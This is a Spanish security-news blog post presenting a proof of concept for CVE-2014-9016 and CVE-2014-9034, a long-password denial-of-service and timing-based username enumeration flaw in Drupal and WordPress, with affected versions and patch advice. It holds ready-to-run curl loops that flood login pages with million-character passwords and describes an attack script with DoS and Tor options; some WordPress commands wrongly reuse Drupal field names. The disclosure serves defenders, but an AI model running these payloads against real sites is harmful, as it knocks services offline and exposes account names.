Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
▼
2014
(Total:
185
)
-
▼
diciembre
(Total:
38
)
- MegaChat: el nuevo Skype con cifrado seguro de Kim...
- Hackean Modems USB 4G y tarjetas SIM usando mensaj...
- Lizard Squad para los ataques DDos a PSN y XBOX Li...
- Hackean la web de AEDE en protesta contra el canon
- El proveedor de hosting DinaHosting sufre un ataqu...
- Kodi 14 Helix, el MediaCenter libre y multiplatafo...
- Un adolescente de 17 años de Londres se declara cu...
- SMB Worm Tool es la herramienta usada en el ataque...
- Publican el código fuente de The Open Bay como Ope...
- Disponible John the Ripper 1.8.0-jumbo-1
- Vídeo demostración de BadUSB con USBdriveby en Mac...
- ShadowCrypt, una extensión de Chrome para cifrar c...
- La extensión de Chrome para cifrar e-mails llega a...
- Vulnerabilidad Misfortune Cookie - La galleta de l...
- La ICANN fue objeto de un ataque de spear phishing
- El FBI utilizó Metasploit para descubrir a usuario...
- Análisis del ransomware TorrentLocker
- Disponible Wifislax 4.10 versión Final
- Detenido a un exdirectivo de Intereconomía por con...
- UFONet - DDoS via WebAbuse - v0.4b "Infection"
- Google Zeitgeist 2014: Lo más buscado en Google
- CryptPHP el malware que afecta a WordPress, Drupal...
- Recopilación de más de 100 libros sobre programaci...
- Snort++ aka Snort 3.0 - Network intrusion preventi...
- ODROID-C1, una alternativa a la Raspberry Pi
- msfpayload y msfencode desaparecerán de Metasploit
- Conferencias de seguridad en Santander: Sh3llCON -...
- thepiratebay.cr NO es el nuevo dominio de The Pira...
- Adobe Flash Player 16 ya se encuentra disponible
- Lizard Squad amenaza con tirar Xbox Live el día de...
- Los vídeos más vistos de YouTube en 2014
- Un redada policial en Suecia deja sin servicio a T...
- Poodle también afecta a TLS 1.2
- Alerta por infecciones masivas por e-mail falso de...
- Solucionada grave vulnerabilidad CSRF en Paypal
- La red temática Criptored cumple 15 años
- (PoC) Proof of Concept Wordpress y Drupal (CVE-201...
- Samurai Web Testing Framework 3.0: LiveDVD para au...
- ► septiembre (Total: 18 )
-
▼
diciembre
(Total:
38
)
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
305
)
Malware
(
265
)
Windows
(
246
)
android
(
244
)
cve
(
237
)
tutorial
(
237
)
manual
(
222
)
software
(
206
)
hardware
(
196
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
iperf3 es la última versión del popular programa iperf para medir el ancho de banda entre dos o más equipos en red local o Internet . Es...
-
A finales del mes de agosto hablábamos de que los legisladores estadounidense habían solicitado la investigación de TP-Link . Y así, ya ten...
(PoC) Proof of Concept Wordpress y Drupal (CVE-2014-9016 y CVE-2014-9034)
martes, 2 de diciembre de 2014
|
Publicado por
el-brujo
|
Editar entrada
Los autores del bug (CVE-2014-9016 y CVE-2014-9034) que causa un DoS (por uso excesivo de CPU) muestran una prueba de concepto (PoC) de la vulnerabilidad.asumiendo que ya ha pasado el suficiente tiempo desde la actualización de seguridad de los conocidos CMS Wordpress 4.0.1 y Drupal 7.34, Los autores creen en el "Responsible Disclosure" y por ese motivo no se publicó antes.
Versiones Drupal afectadas
- Drupal core 7.x versions anteriores a 7.34
- Secure Password Hashes 6.x-2.x versiones anteriores a 6.x-2.1.
Más información:
- Drupal Core - Moderately Critical - Multiple Vulnerabilities - SA-CORE-2014-006
- SA-CONTRIB-2014-113 - Secure Password Hashes - Denial of Service
Detalles de la vulnerabilidad
Se ha descubierto una vulnerabilidad que puede ser usado en instalaciones por defecto de Drupal con el fin de:
- adivinar nombres de usuario
- Realizar una denegación de servicio (DoS)
Con los escenarios siguientes, vamos a mostrar cómo funciona este ataque. Cuando queremos acceder a Drupal sitio, tenemos que escribir un nombre de usuario y una contraseña:
Escenario 1:
Si el usuario no existe, el hash de la contraseña no se calcula porque el usuario no existe.
Escenario 2:
Si existe el nombre de usuario, el hash de la contraseña se calcula y compara con el hash almacenado en la base de datos. Si el hash comparación es la misma, se le concede acceso al sistema. Si no, usted es rechazado.
Escenario 3 - Aprovechando la vulnerabilidad:
adivinando usuario
Si existe el nombre de usuario y la contraseña escrita es, por ejemplo 1000000 veces, el hecho de que cuando se genera un hash de la contraseña tan larga con el fin de compararlo con el hash almacenado en la base de datos, se necesita mucho más tiempo y la medición del tiempo se incrementa . Así que si se aumenta el retardo, existe el nombre de usuario.
En Drupal, la forma de calcular el hash de la contraseña (SHA512 con un salt) utilizando resultados phpass en los recursos de la CPU que se ve afectada cuando se proporcionan contraseñas muy largas.
Denegación de servicio
Si llevamos a cabo varios intentos de conexión mediante el uso de un nombre de usuario válido al mismo tiempo con contraseñas largas, que causa una denegación de servicio en el servidor. Hemos observado dos escenarios diferentes en un 7,32, Apache y MySQL instalación por defecto de Drupal. Dependiendo del número de intentos de conexión y el tiempo entre ellos, que tendrá dos escenarios diferentes:
- El ataque DOS se bloquea todo el servidor porque se llega a la memoria RAM y swap. También se llegó a la CPU.
- El ataque DOS se bloquea la base de datos.
Note que el servidor no se bloquea debido al cálculo de hash. La vulnerabilidad aparece junto con Apache, porque Apache espera a PHP para terminar el cálculo hash. En un proceso de autenticación concurrente con un usuario válido y contraseñas muy largas, por un lado PHP consume la CPU con los procesos de cálculo y en el otro lado, los procesos de Apache que están esperando, consume la memoria hasta que el servidor o los accidentes de base de datos.
Si la configuración de apache está optimizado y ajustado a los recursos de hardware, somos capaces de llegar a todas las sesiones disponibles de forma rápida y manejarlos durante 30 segundos los cuales realiza una DOS sin que se caiga el servidor o base de datos.
¿Por qué pusimos 30 segundos?
30 segundos es el tiempo máximo que se permite correr a un script antes de ser detenido por el intérprete. Por defecto, el valor max_execution_time está establecido en 30 en la configuración php.ini. Esto ayuda a prevenir que scripts pobremente escritos congestionen el servidor.
Vídeo
Sript Python Code
Python script for Wordpress User Enumeration Time-Based Attack CVE-2014-9034Uso:
-u,--url, URL to scan (http://127.0.0.1)
-U,--user, User to scan
-f,--file, File with user names
-n,--num, Number of characters to use (default 1000000)
-d,--dos, Try to stablish a DOS condition
-t,--threads, Number of connections attemps (every 10 seconds) for the DOS attack (default 10)
--proxy, SOCKS 5 proxy, tipically TOR use: 127.0.0.1:9050
Drupal Denial of Service CVE-2014-9016
Generate a pyaload and try with a non-valid user:
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done
Wordpress Denial of Service CVE-2014-9034
Generate a pyaload and try with a non-valid user:$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Generate a pyaload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Perform a Dos with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
Parche - Fix
Instalar la versión más reciente:
- Si utilizas Drupal 7.x, actualiza a Drupal core 7.34.
- Si utilizas el módulo Secure hashes de contraseñas para Drupal 6.x, actualizar a Secure Hash Contraseña 6.x-2.1 Véase también la contraseña segura Hash página del proyecto.
- Si ha configurado un archivo personalizado password.inc para su sitio que necesita para asegurarse de que no es propenso a la misma vulnerabilidad.
Drupal versión 7.34 verifica que las contraseñas de más de 512 bytes no se "hashean"
Referencias, fuente:
http://www.behindthefirewalls.com/2014/12/cve-2014-9016-and-cve-2014-9034-PoC.html
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.